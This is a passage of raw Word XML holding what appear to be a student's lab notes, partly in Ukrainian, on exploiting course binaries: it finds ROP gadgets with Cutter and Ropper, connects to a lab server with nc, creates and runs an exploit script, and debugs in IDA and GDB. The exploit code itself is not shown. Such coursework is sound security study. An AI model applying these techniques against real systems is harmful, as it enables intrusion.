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0C05D" w14:textId="66A37347" w:rsidR="00642742" w:rsidRDefault="00F20AE3" w:rsidP="00642742">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Find gadgets</w:t>
      </w:r>
      <w:r w:rsidR="00CA367E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00475625" w14:textId="02201661" w:rsidR="00C17031" w:rsidRDefault="00C17031" w:rsidP="00190F37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Assume you want to find "</w:t>
      </w:r>
      <w:r w:rsidRPr="0093319C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pop edi; pop ebp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; ret":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15852219" w14:textId="5DFE4FC6" w:rsidR="00190F37" w:rsidRPr="00190F37" w:rsidRDefault="00190F37" w:rsidP="00190F37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00190F37">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x08058bb8      pop     ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F79C9A3" w14:textId="77777777" w:rsidR="00190F37" w:rsidRPr="00190F37" w:rsidRDefault="00190F37" w:rsidP="00190F37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00190F37">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x08058bb9      pop     esi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A67A698" w14:textId="6E3940AA" w:rsidR="00617A9D" w:rsidRDefault="00190F37" w:rsidP="00190F37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00190F37">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x08058bba      ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC8C650" w14:textId="77777777" w:rsidR="004F2BB3" w:rsidRDefault="004F2BB3" w:rsidP="00190F37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F74C124" w14:textId="68B32F42" w:rsidR="00CA367E" w:rsidRDefault="00CA367E" w:rsidP="00F62F29">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cutter (Windows)</w:t>
      </w:r>
      <w:r w:rsidR="00DE7FD8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282D3C4B" w14:textId="14F8B3C2" w:rsidR="00F20AE3" w:rsidRDefault="005E10DA" w:rsidP="009B7AE2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Search in ROP gadgets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16518DEA" w14:textId="04F3BEB5" w:rsidR="0093319C" w:rsidRDefault="0093319C" w:rsidP="009B7AE2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0093319C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pop edi; pop ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080CF6E9" w14:textId="5CAA31DB" w:rsidR="00EF7274" w:rsidRDefault="00EF7274" w:rsidP="009B7AE2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08477435" wp14:editId="53735F3E">
            <wp:extent cx="6645910" cy="417195"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="510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5371" w14:textId="77777777" w:rsidR="00411CD0" w:rsidRDefault="00411CD0" w:rsidP="009B7AE2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50A44DF0" w14:textId="41092B58" w:rsidR="0045093D" w:rsidRDefault="00BB1AB3" w:rsidP="007171B9">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ropper (</w:t>
      </w:r>
      <w:r w:rsidR="0045093D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="0045093D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598ADD7E" w14:textId="153898B0" w:rsidR="00D62824" w:rsidRDefault="00C33FBC" w:rsidP="006C22C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00C33FBC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo apt install ropper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E29DA4C" w14:textId="283B0104" w:rsidR="00504A69" w:rsidRDefault="00504A69" w:rsidP="006C22C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ ropper -f </w:t>
      </w:r>
      <w:r w:rsidR="00B97C2B" w:rsidRPr="003B41F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10101_YAKOBCHUK_Dmytro</w:t>
      </w:r>
      <w:r w:rsidR="00C14710">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>_32</w:t>
      </w:r>
      <w:r w:rsidR="00B97C2B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF6684">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00D74FF9" w:rsidRPr="00D74FF9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-nocolor</w:t>
      </w:r>
      <w:r w:rsidR="001A7628">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; gadgets.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083558D5" w14:textId="432B99A4" w:rsidR="00444021" w:rsidRDefault="007A1326" w:rsidP="006C22C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ cat </w:t>
      </w:r>
      <w:r w:rsidR="00464273">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">gadgets.txt | grep </w:t>
      </w:r>
      <w:r w:rsidR="00444021">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"pop ebx; pop esi; ret"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061E3FE8" w14:textId="77777777" w:rsidR="000845E2" w:rsidRDefault="000845E2" w:rsidP="006C22C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="766DE564" w14:textId="77777777" w:rsidR="00AB2088" w:rsidRDefault="00AB2088" w:rsidP="006C22C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="572456B2" w14:textId="2F314500" w:rsidR="00815B16" w:rsidRPr="00464441" w:rsidRDefault="005C2DA9" w:rsidP="00464441">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Common</w:t>
      </w:r>
      <w:r w:rsidRPr="004356B6">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424DD90A" w14:textId="466CE357" w:rsidR="00815B16" w:rsidRDefault="00C655D2" w:rsidP="0084149C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>П</w:t>
      </w:r>
      <w:r w:rsidR="000729C4">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ідключимося до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D55D9D" w14:textId="4B4D54FA" w:rsidR="0084149C" w:rsidRPr="005C2DA9" w:rsidRDefault="00F90EDB" w:rsidP="0084149C">
      <w:r w:rsidRPr="005C2DA9">
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidR="005013E3" w:rsidRPr="005013E3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:r w:rsidR="005013E3" w:rsidRPr="005C2DA9">
        <w:t xml:space="preserve"> 192.168.1.20 10100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CF57C7" w14:textId="77777777" w:rsidR="00D11A00" w:rsidRPr="004356B6" w:rsidRDefault="00D11A00" w:rsidP="0084149C"/>
    <w:p w14:paraId="7AE9F412" w14:textId="4540B72C" w:rsidR="005A1F81" w:rsidRPr="005A1F81" w:rsidRDefault="005A1F81" w:rsidP="0084149C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Створимо файл експлойту:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B492A5" w14:textId="1C2FFAEE" w:rsidR="00A70F1F" w:rsidRPr="004356B6" w:rsidRDefault="005A1F81" w:rsidP="005A1F81">
      <w:r w:rsidRPr="004356B6">
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidR="001E2BFF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nano</w:t>
      </w:r>
      <w:r w:rsidR="0093044F" w:rsidRPr="004356B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0093044F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pwn</w:t>
      </w:r>
      <w:r w:rsidR="009571C6" w:rsidRPr="004356B6">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="008A72A9" w:rsidRPr="004356B6">
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidR="0093044F" w:rsidRPr="004356B6">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0093044F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424298EF" w14:textId="42B75342" w:rsidR="005A1F81" w:rsidRDefault="00A70F1F" w:rsidP="005A1F81">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidR="005A1F81">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod ugo+rwx </w:t>
      </w:r>
      <w:r w:rsidR="00384F8D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pwn_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF1ECC8" w14:textId="10580548" w:rsidR="005A1F81" w:rsidRDefault="005A1F81" w:rsidP="005A1F81">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="002037FF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cat /dev/null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F6C0B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00805162">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">pwn_64 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp; nano </w:t>
      </w:r>
      <w:r w:rsidR="00805162">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pwn_64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">.py </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB09A1B" w14:textId="77777777" w:rsidR="009D2E2B" w:rsidRDefault="009D2E2B" w:rsidP="0084149C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69D61C05" w14:textId="77777777" w:rsidR="00A11D03" w:rsidRDefault="00A11D03" w:rsidP="0084149C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A811148" w14:textId="77777777" w:rsidR="00A11D03" w:rsidRPr="00A11D03" w:rsidRDefault="00A11D03" w:rsidP="00A11D03">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00A11D03">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7480F45C" w14:textId="77777777" w:rsidR="00A11D03" w:rsidRDefault="00A11D03" w:rsidP="00A11D03">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Скопіюємо виконуваний файл на ВМ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122B5B45" w14:textId="330AD16F" w:rsidR="00A11D03" w:rsidRPr="00764E1B" w:rsidRDefault="00A11D03" w:rsidP="00A11D03">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00355884">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scp C:/Users/lol19/Desktop/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mkr1/</w:t>
      </w:r>
      <w:r w:rsidRPr="00B24FF6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10100_ILIN_Mykola</w:t>
      </w:r>
      <w:r w:rsidR="007D701E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>_64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00355884">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sam@192.168.1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>18:/home/sam/mkr1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09966A84" w14:textId="77777777" w:rsidR="00A11D03" w:rsidRPr="00860919" w:rsidRDefault="00A11D03" w:rsidP="0084149C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B190714" w14:textId="77777777" w:rsidR="000A7187" w:rsidRDefault="000A7187" w:rsidP="0084149C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="644653A5" w14:textId="3FEEFE9E" w:rsidR="009D2E2B" w:rsidRDefault="009D2E2B" w:rsidP="00B04C9D">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WSL</w:t>
      </w:r>
      <w:r w:rsidR="000A7187">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C037266" w14:textId="7CDC8E44" w:rsidR="00E31B23" w:rsidRDefault="00E910D2" w:rsidP="001D731D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PS&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00E31B23">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> wsl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B832D15" w14:textId="1517E95E" w:rsidR="00623B36" w:rsidRDefault="00623B36" w:rsidP="001D731D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidR="008A5741">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">cd </w:t>
      </w:r>
      <w:r w:rsidR="002760D3" w:rsidRPr="002760D3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/mnt/c/Users/lol19/Desktop</w:t>
      </w:r>
      <w:r w:rsidR="002760D3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/mkr1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BBCB72" w14:textId="18A3B2FA" w:rsidR="007C1890" w:rsidRDefault="007C1890" w:rsidP="001D731D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00E01315">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python3 pwn</w:t>
      </w:r>
      <w:r w:rsidR="009B5841">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="008D611E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidRPr="00E01315">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4841E300" w14:textId="7415386A" w:rsidR="00E01315" w:rsidRPr="00400005" w:rsidRDefault="004D40B6" w:rsidP="001D731D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidR="00623B36" w:rsidRPr="00623B36">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>./10100_ILIN_Mykola</w:t>
      </w:r>
      <w:r w:rsidR="00400005">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B50D08" w14:textId="4707CAD6" w:rsidR="008B3722" w:rsidRDefault="008B3722" w:rsidP="001D731D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AAE2B32" w14:textId="77777777" w:rsidR="00703C69" w:rsidRDefault="00703C69" w:rsidP="001D731D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79824BEA" w14:textId="5DCDE11B" w:rsidR="004E5790" w:rsidRDefault="00A1681F" w:rsidP="00A768C5">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debug</w:t>
      </w:r>
      <w:r w:rsidR="00703C69">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00427BA2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="00703C69">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00703C69">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IDA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468B379B" w14:textId="3418ED35" w:rsidR="00AB02DE" w:rsidRPr="009A78E2" w:rsidRDefault="00AB02DE" w:rsidP="00AB02DE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21315">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/mnt/c/Users/lol19/Desktop/</w:t>
      </w:r>
      <w:r w:rsidR="008B237A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mkr1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F72CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10101_YAKOBCHUK_Dmytro</w:t>
      </w:r>
      <w:r w:rsidR="009A78E2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>_32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E10C13" w14:textId="241DA3FF" w:rsidR="00AB02DE" w:rsidRDefault="00AB02DE" w:rsidP="00AB02DE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21315">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/mnt/c/Users/lol19/Desktop/</w:t>
      </w:r>
      <w:r w:rsidR="00727AAA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mkr1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059932C9" w14:textId="77777777" w:rsidR="00AB02DE" w:rsidRDefault="00AB02DE" w:rsidP="00AB02DE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00024748">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>./linux_server64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FB5716" w14:textId="77777777" w:rsidR="0040089F" w:rsidRDefault="0040089F" w:rsidP="001D731D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51A5E171" w14:textId="084D25EF" w:rsidR="002367AD" w:rsidRDefault="00A1681F" w:rsidP="009A67B7">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debug</w:t>
      </w:r>
      <w:r w:rsidR="000F07CC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00427BA2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="000F07CC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00323D98">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GDB</w:t>
      </w:r>
      <w:r w:rsidR="002367AD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6940AB7C" w14:textId="60D6A302" w:rsidR="009A67B7" w:rsidRPr="00392B7C" w:rsidRDefault="009A67B7" w:rsidP="0021684A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ gdb </w:t>
      </w:r>
      <w:r w:rsidR="00FD75CB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-q </w:t>
      </w:r>
      <w:r w:rsidR="00FD75CB" w:rsidRPr="00F72CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10101_YAKOBCHUK_Dmytro</w:t>
      </w:r>
      <w:r w:rsidR="00FD75CB">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>_32</w:t>
      </w:r>
      <w:r w:rsidR="00FD75CB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -x </w:t>
      </w:r>
      <w:r w:rsidR="00CB6C4E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>breaks32.gdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4237D78B" w14:textId="13B7D774" w:rsidR="007E7FA1" w:rsidRDefault="007E7FA1" w:rsidP="0021684A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Print stack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F833F2" w14:textId="0C62B7F5" w:rsidR="0021684A" w:rsidRDefault="0021684A" w:rsidP="0021684A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
